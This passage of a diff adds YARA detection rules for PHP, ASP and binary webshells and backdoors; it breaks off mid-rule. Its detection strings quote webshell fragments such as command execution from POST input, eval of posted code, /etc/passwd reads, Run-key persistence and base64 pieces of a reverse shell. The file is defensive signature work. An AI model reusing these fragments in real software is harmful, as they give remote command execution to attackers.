+		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
+	strings:
+		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_PhpSpy_Ver_2006 {
+	meta:
+		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+		author = "Florian Roth"
+		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
+	strings:
+		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
+		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
+	condition:
+		1 of them
+}
+rule WebShell_ZyklonShell {
+	meta:
+		description = "PHP Webshells Github Archive - file ZyklonShell.php"
+		author = "Florian Roth"
+		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
+	strings:
+		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
+		$s3 = "<H1>Not Found</H1>" fullword
+	condition:
+		all of them
+}
+rule WebShell_php_webshells_myshell {
+	meta:
+		description = "PHP Webshells Github Archive - file myshell.php"
+		author = "Florian Roth"
+		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
+	strings:
+		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
+		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
+	condition:
+		1 of them
+}
+rule WebShell_php_webshells_lolipop {
+	meta:
+		description = "PHP Webshells Github Archive - file lolipop.php"
+		author = "Florian Roth"
+		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
+	strings:
+		$s3 = "$commander = $_POST['commander']; " fullword
+		$s9 = "$sourcego = $_POST['sourcego']; " fullword
+		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+	condition:
+		all of them
+}
+rule WebShell_simple_cmd {
+	meta:
+		description = "PHP Webshells Github Archive - file simple_cmd.php"
+		author = "Florian Roth"
+		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
+	strings:
+		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s2 = "<title>G-Security Webshell</title>" fullword
+		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_go_shell {
+	meta:
+		description = "PHP Webshells Github Archive - file go-shell.php"
+		author = "Florian Roth"
+		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
+	strings:
+		$s0 = "#change this password; for power security - delete this file =)" fullword
+		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
+		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
+		$s12 = "print << \"[kalabanga]\";" fullword
+		$s13 = "<title>GO.cgi</title>" fullword
+	condition:
+		1 of them
+}
+rule WebShell_aZRaiLPhp_v1_0 {
+	meta:
+		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth"
+		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
+	strings:
+		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
+		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+	condition:
+		2 of them
+}
+rule WebShell_webshells_zehir4 {
+	meta:
+		description = "Webshells Github Archive - file zehir4"
+		author = "Florian Roth"
+		hash = "788928ae87551f286d189e163e55410acbb90a64"
+		score = 55
+	strings:
+		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
+		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
+	condition:
+		1 of them
+}
+rule WebShell_zehir4_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+		author = "Florian Roth"
+		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
+	strings:
+		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
+		$s11 = "frames.byZehir.document.execCommand("
+		$s15 = "frames.byZehir.document.execCommand(co"
+	condition:
+		2 of them
+}
+rule WebShell_php_webshells_lostDC {
+	meta:
+		description = "PHP Webshells Github Archive - file lostDC.php"
+		author = "Florian Roth"
+		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
+	strings:
+		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
+		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
+		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
+		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
+		$s12 = "$ret = shellexec($command);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_CasuS_1_5 {
+	meta:
+		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+		author = "Florian Roth"
+		hash = "7eee8882ad9b940407acc0146db018c302696341"
+	strings:
+		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
+		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
+		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
+	condition:
+		1 of them
+}
+rule WebShell_ftpsearch {
+	meta:
+		description = "PHP Webshells Github Archive - file ftpsearch.php"
+		author = "Florian Roth"
+		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
+	strings:
+		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
+		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
+		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
+		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {
+	meta:
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+	strings:
+		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
+		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
+		$s11 = " *   Coded by Pixcher" fullword
+		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {
+	meta:
+		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
+		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
+		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
+	strings:
+		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
+		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
+		$s3 = "$dt = $_POST['filecontent'];" fullword
+		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
+		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
+		$s11 = "document.cmdform.command.value='';" fullword
+		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
+	condition:
+		3 of them
+}
+rule WebShell_Generic_PHP_7 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
+		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+		hash3 = "715f17e286416724e90113feab914c707a26d456"
+	strings:
+		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+		$s4 = "if( $action == \"dumpTable\" )" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {
+	meta:
+		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
+		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
+	strings:
+		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_8 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
+		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
+		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
+	strings:
+		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
+		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s3 = "/* I added this to ensure the script will run correctly..." fullword
+		$s14 = "<!--    </form>   -->" fullword
+		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
+		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
+	condition:
+		3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
+	strings:
+		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
+		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
+		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
+		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_9 {
+	meta:
+		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
+		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+	strings:
+		$s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword
+		$s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword
+		$s12 = "if (!empty($_POST['c'])){" fullword
+		$s13 = "passthru($_POST['c']);" fullword
+		$s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword
+		$s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword
+	condition:
+		3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv {
+	meta:
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+	strings:
+		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
+		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
+		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_1 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
+		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+	strings:
+		$s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword
+		$s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword
+		$s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword
+		$s9 = "document.shell.command.value = command_hist[current_line];" fullword
+		$s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"
+		$s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword
+		$s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword
+	condition:
+		5 of them
+}
+rule WebShell_Generic_PHP_2 {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
+		$s4 = "\\$port = {$_POST['port']};" fullword
+		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
+		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
+		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
+	condition:
+		4 of them
+}
+rule WebShell__CrystalShell_v_1_erne_stres {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
+		$s4 = "var_dump(curl_exec($ch));" fullword
+		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
+		$s10 = "$m=$_POST['curl'];" fullword
+		$s13 = "$u1p=$_POST['copy'];" fullword
+		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
+		$s15 = "$string = explode(\"|\",$string);" fullword
+		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
+	condition:
+		5 of them
+}
+rule WebShell_Generic_PHP_3 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
+		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
+		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
+		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
+	strings:
+		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
+		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
+		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
+		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
+		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_4 {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
+		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
+		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
+		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
+		$s10 = "foreach ($arr as $filename) {" fullword
+		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_5 {
+	meta:
+		description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"
+		hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"
+		hash2 = "ad86ef7f24f75081318146edc788e5466722a629"
+	strings:
+		$s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword
+		$s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword
+		$s11 = "if (($perms & 0xC000) == 0xC000) {" fullword
+		$s12 = "$info .= (($perms & 0x0008) ?" fullword
+		$s16 = "// Block special" fullword
+		$s18 = "$info = 's';" fullword
+	condition:
+		all of them
+}
+rule WebShell_GFS {
+	meta:
+		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
+		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
+		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
+	strings:
+		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
+		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
+		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
+	condition:
+		all of them
+}
+rule WebShell__CrystalShell_v_1_sosyete_stres {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
+		$s15 = "<a bookmark=\"minipanel\">" fullword
+		$s16 = "background-color: #EBEAEA;" fullword
+		$s18 = "color: #D5ECF9;" fullword
+		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_10 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
+	strings:
+		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
+		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
+		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
+		$s12 = "else if( $mode & 0xA000 ) " fullword
+		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
+		$s20 = "font-size: 8pt;" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_11 {
+	meta:
+		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
+		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
+		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
+		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
+	strings:
+		$s5 = "$filename = $backupstring.\"$filename\";" fullword
+		$s6 = "while ($file = readdir($folder)) {" fullword
+		$s7 = "if($file != \".\" && $file != \"..\")" fullword
+		$s9 = "$backupstring = \"copy_of_\";" fullword
+		$s10 = "if( file_exists($file_name))" fullword
+		$s13 = "global $file_name, $filename;" fullword
+		$s16 = "copy($file,\"$filename\");" fullword
+		$s18 = "<td width=\"49%\" height=\"142\">" fullword
+	condition:
+		all of them
+}
+rule WebShell__findsock_php_findsock_shell_php_reverse_shell {
+	meta:
+		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
+		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
+	strings:
+		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_6 {
+	meta:
+		description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
+		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+		$s5 = "echo shell_exec($com);" fullword
+		$s7 = "if($sertype == \"winda\"){" fullword
+		$s8 = "function execute($com)" fullword
+		$s12 = "echo decode(execute($cmd));" fullword
+		$s15 = "echo system($com);" fullword
+	condition:
+		4 of them
+}
+
+rule Unpack_Injectt {
+	meta:
+		description = "Webshells Auto-generated - file Injectt.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8a5d2158a566c87edc999771e12d42c5"
+	strings:
+		$s2 = "%s -Run                              -->To Install And Run The Service"
+		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
+		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_fso {
+	meta:
+		description = "Webshells Auto-generated - file fso.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b37f3cde1a08890bd822a182c3a881f6"
+	strings:
+		$s0 = "<!-- PageFSO Below -->"
+		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_ssh {
+	meta:
+		description = "Webshells Auto-generated - file ssh.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1aa5307790d72941589079989b4f900e"
+	strings:
+		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
+	condition:
+		all of them
+}
+rule Debug_BDoor {
+	meta:
+		description = "Webshells Auto-generated - file BDoor.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e4e8e31dd44beb9320922c5f49739955"
+	strings:
+		$s1 = "\\BDoor\\"
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+	condition:
+		all of them
+}
+rule bin_Client {
+	meta:
+		description = "Webshells Auto-generated - file Client.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
+	strings:
+		$s0 = "Recieved respond from server!!"
+		$s4 = "packet door client"
+		$s5 = "input source port(whatever you want):"
+		$s7 = "Packet sent,waiting for reply..."
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_ZXshell {
+	meta:
+		description = "Webshells Auto-generated - file ZXshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "246ce44502d2f6002d720d350e26c288"
+	strings:
+		$s0 = "WPreviewPagesn"
+		$s1 = "DA!OLUTELY N"
+	condition:
+		all of them
+}
+rule RkNTLoad {
+	meta:
+		description = "Webshells Auto-generated - file RkNTLoad.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "262317c95ced56224f136ba532b8b34f"
+	strings:
+		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s2 = "5pur+virtu!"
+		$s3 = "ugh spac#n"
+		$s4 = "xcEx3WriL4"
+		$s5 = "runtime error"
+		$s6 = "loseHWait.Sr."
+		$s7 = "essageBoxAw"
+		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
+	condition:
+		all of them
+}
+rule binder2_binder2 {
+	meta:
+		description = "Webshells Auto-generated - file binder2.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d594e90ad23ae0bc0b65b59189c12f11"
+	strings:
+		$s0 = "IsCharAlphaNumericA"
+		$s2 = "WideCharToM"
+		$s4 = "g 5pur+virtu!"
+		$s5 = "\\syslog.en"
+		$s6 = "heap7'7oqk?not="
+		$s8 = "- Kablto in"
+	condition:
+		all of them
+}
+rule thelast_orice2 {
+	meta:
+		description = "Webshells Auto-generated - file orice2.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "aa63ffb27bde8d03d00dda04421237ae"
+	strings:
+		$s0 = " $aa = $_GET['aa'];"
+		$s1 = "echo $aa;"
+	condition:
+		all of them
+}
+rule FSO_s_sincap {
+	meta:
+		description = "Webshells Auto-generated - file sincap.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
+	strings:
+		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
+		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
+	condition:
+		all of them
+}
+rule PhpShell {
+	meta:
+		description = "Webshells Auto-generated - file PhpShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
